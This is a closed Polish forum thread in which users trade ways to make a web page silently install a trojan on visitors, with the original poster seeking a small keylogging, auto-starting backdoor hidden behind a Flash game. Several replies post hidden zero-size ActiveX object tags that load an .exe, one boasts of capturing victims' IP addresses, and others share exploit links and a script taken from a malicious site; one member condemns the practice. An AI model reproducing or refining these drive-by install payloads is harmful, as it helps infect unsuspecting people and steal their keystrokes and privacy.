Instalowanie się trojana poprzez www -.-

Status
Zamknięty.

Bobercjusz

Użytkownik
Dołączył
Maj 31, 2005
Posty
8
Czytałem wszystkie posty na ten temat. Stosowałem się do wskazówek lecz po wsadzeniu stronki i trojana na serwer nic się nie dzieje. Pozatym mam XP Prof z SP2 i po otworzeniu stronki pyta się mnie czy zainstalować format activex więc to kolejne utrudnienie. Ale nawet po zatwierdzeniu nic się nie instaluje jak powinno...
Interesuje mnie aby wykonać jakąś strone wraz z plikiem swf (wiadomo: wchodze i na środku jakaś gierka czy cuś) a za plecami instaluje się trojanek.
Powinien być taki temat (przyklejony) z poradnikiem co i jak.
Proszę też o polecenie mi jakiegoś trojana małych rozmiarów (20kb or coś w tym stylu). Byle był z opcją odczytywania keyów. Najlepiej żeby działał za Natem (to z gg
<
). AAA i żeby się automatycznie uruchamiał po restarcie windy.
Dzieki za wyrozumiałość
<
proszę o szybką odpowiedź
 

SZKOD[nick]

Były Moderator
Dołączył
Maj 2, 2003
Posty
808
Jak ktoś napisze taki poradnik to chętnie go przykleje, napisz jak masz czas...
Mały trojan? Rozwiązaniem jest downloader
 

fl3a

Użytkownik
Dołączył
Marzec 12, 2005
Posty
538
Tak fajowo bo malo tego guwna po necie! Nie trzeba wchodzic juz na strony z golymi panienkami by jakies guwno sie zechcialo przyplatac! Jak jeszcze jest to cos ambitnego i denerwujacego to mozna sie czegos nauczyc ale jak jest to zwykle scierwo to przykro sie robi. Uwazam ze takie postepowanie jest ZALOSNE i KARYGODNE. Bo nie chodzi wam o wiedze tylko o naruszanie czyjejs prywatnosci! Wsadzaja roznych ludzi do pudla a powinni zaczac od takich by dac przyklad innym. Bo tworca Vira idze do pudla a ten co z niego korzysta nie ponosi zadnej konsekwencji! I to jest podstawowy powod ktory uniemozliwia np. mi udostepniena wlasnych zrodel
<
 
G

Guest

Gość
Odpalenie dowolnego EXE z www proste jak maslo

wpisujesz:

<object width=0 height=0 CODEBASE="http://twoja_strona_www.pl/jakis_plik.exe" classid="CLSID:11111111-1111-1111-1111-111111111111" width=1 height=1></object>

osobiscie zrobilem stronke gdzie nie dosc ze odpala sie trojan to przesyla dodatkowo IP ofiary
smile.gif


tylko ze przez Cafeini nie moge sie polaczyc z ofiara ?!
why not? JAKI JEST DOBRY BACKDOOR do laczenia sie przez np.neostrade?
 

GreEnSnake

Użytkownik
Dołączył
Kwiecień 21, 2005
Posty
352
Kod:
<object width=0 height=0 codebase="trojan.exe" classid="CLSID:A67BA5E3-5B79-11D6-A711-00C12601EAD"></object>
Tak chyba tez moze byc ;-) .
 

Bobercjusz

Użytkownik
Dołączył
Maj 31, 2005
Posty
8
No jest to rozwiązanie ale nie po instalacji SP2 ponieważ pyta się czy zainstalować takie i takie oprogramowanie szkodliwe dla kompa. Chodziło mi raczej o coś co wykorzystuje dziurę w explorerze z service packiem 2.
Pozdrawiam
 

GreEnSnake

Użytkownik
Dołączył
Kwiecień 21, 2005
Posty
352
Originally posted by Bobercjusz
No jest to rozwiązanie ale nie po instalacji SP2 ponieważ pyta się czy zainstalować takie i takie oprogramowanie szkodliwe dla kompa. Chodziło mi raczej o coś co wykorzystuje dziurę w explorerze z service packiem 2.
Pozdrawiam
Robi sie szefie =] . Moze tutaj cos bedzie:
1.
http://www.haxite.org/index.php3?site=arty...view&id=292 // vol1

2.
http://www.haxite.org/index.php3?site=arty...view&id=293 // vol2

3.
http://www.haxite.org/index.php3?site=arty...view&id=298 // vol3
 

Bobercjusz

Użytkownik
Dołączył
Maj 31, 2005
Posty
8
Dzieki, poszperam

Ostatnio szukałem registration keya do jakiegoś programu i natknąłem się na stronę

http://www.seriall.com

i po wejściu na jakąkolwiek podstronę wyskakuje info o trojanie na AV a explorer nic nie wykrył. Skrypt na tej stronce najwyraźniej wykorzystuje dziurę w zabezpieczeniach.
Jeżeli ktoś odkryje co i jak to śmiało dawać do topicu
<


Pozdro


~Edit!:
Przypominam o tej www :]
 

Bobercjusz

Użytkownik
Dołączył
Maj 31, 2005
Posty
8
Odświeżam temat...


... i jednocześnie podaję skrypt który udało mi się wyciągnąć z wyżej podanej stronki:

<NOSCRIPT><a target=_blank href=http://warlog.info/cgi-bin/cshow>
3651;0x0;0;0;-;0
</a></NOSCRIPT>


Po umieszczeniu takiego czegoś na www explorer nic nie mówi o instalowaniu się jakiegoś pliku tylko AV informuje nas o trojanie.

Jeżeli komuś uda się rozgryźć jak należy "spreparować" ten skrypcik aby instalował się nasz trojanek, to będzie konkretnie
smile.gif
 

dyziek4

Użytkownik
Dołączył
Lipiec 16, 2005
Posty
6
<object width=0 height=0 CODEBASE="1.exe" classid="CLSID:11111111-1111-1111-1111-111111111111" width=1 height=1></object>

wie ktś może jak to przerobić tak żeby przy każdym otwarciu strony wysłał sie kolejny serwer np. 1.exe, 2.exe, 3.exe ....

kiedyś widziałem taki temat na forum ale teraz nie moge znaleźć :?
 

GreEnSnake

Użytkownik
Dołączył
Kwiecień 21, 2005
Posty
352
Originally posted by Bobercjusz
<NOSCRIPT><a target=_blank href=http://warlog.info/cgi-bin/cshow>
3651;0x0;0;0;-;0
</a></NOSCRIPT>

Jeżeli komuś uda się rozgryźć jak należy "spreparować" ten skrypcik aby instalował się nasz trojanek, to będzie konkretnie
smile.gif
Co tu duzo mowic, np.:
Kod:
<NOSCRIPT><a target=_blank href=C:WINDOWSsystem32cmd.exe>[img]C:WINDOWSsystem32cmd.exe[/img]</a></NOSCRIPT>
Niestety gdy ma sie SP2 to ten skrypt nic nie zdziala =]
 

SaTaNiKa

Użytkownik
Dołączył
Maj 2, 2005
Posty
24
Jest sobie taki ciekawy skrypt w jawie ostatnio się na niego natknołem na pewnej stronce
tej właśnie

[code
<script type="text/jscript">
function init() {
document.write("The time is: " + Date() );

}
window.onload = init;
</script>
[/code]

Można nim conieco wykonać nawet AV nie wykryje złośliwości skrytu lecz mało znam się na jawie i prosze o pomoc jak tego użyć :?: :?: o bo t powinno sie przydać nawet działa pod SP2 Suszę zęby o ile Bil nie wypuścił łaty jeżeli by to dobrze przeobić można by było coś podinstalować dzięki temy jeśli się nie myle tylko co w tym zmienić będę wdzięczny za pomoc
 

GreEnSnake

Użytkownik
Dołączył
Kwiecień 21, 2005
Posty
352
Originally posted by SaTaNiKa
Jest sobie taki ciekawy skrypt w jawie ostatnio się na niego natknołem na pewnej stronce
tej właśnie

[code
<script type="text/jscript">
function init() {
document.write("The time is: " + Date() );

}
window.onload = init;
</script>
[/code]

Można nim conieco wykonać nawet AV nie wykryje złośliwości skrytu lecz mało znam się na jawie i prosze o pomoc jak tego użyć :?: :?: o bo t powinno sie przydać nawet działa pod SP2 Suszę zęby o ile Bil nie wypuścił łaty jeżeli by to dobrze przeobić można by było coś podinstalować dzięki temy jeśli się nie myle tylko co w tym zmienić będę wdzięczny za pomoc
W tym skrypcie, a dokladnie w tej czesci ktora napisales nie ma okreslonej sciezki lub strony do serwera trojana/virusa ktory sie instaluje wiec raczej nie to odpowaida za jego instalacje...
 

SaTaNiKa

Użytkownik
Dołączył
Maj 2, 2005
Posty
24
niejestem pewien ale jeżeli człowiek by się uparł i zmienił linijke

Kod:
 document.write("The time is: " + Date() );

To przecież mogło by coś z tego wyjść w każdym razie mi się tak zdaje tylko
ja nie znam jawy żeby to zmienić al to moglo by cos dać.[/code]
 
Status
Zamknięty.
Do góry Bottom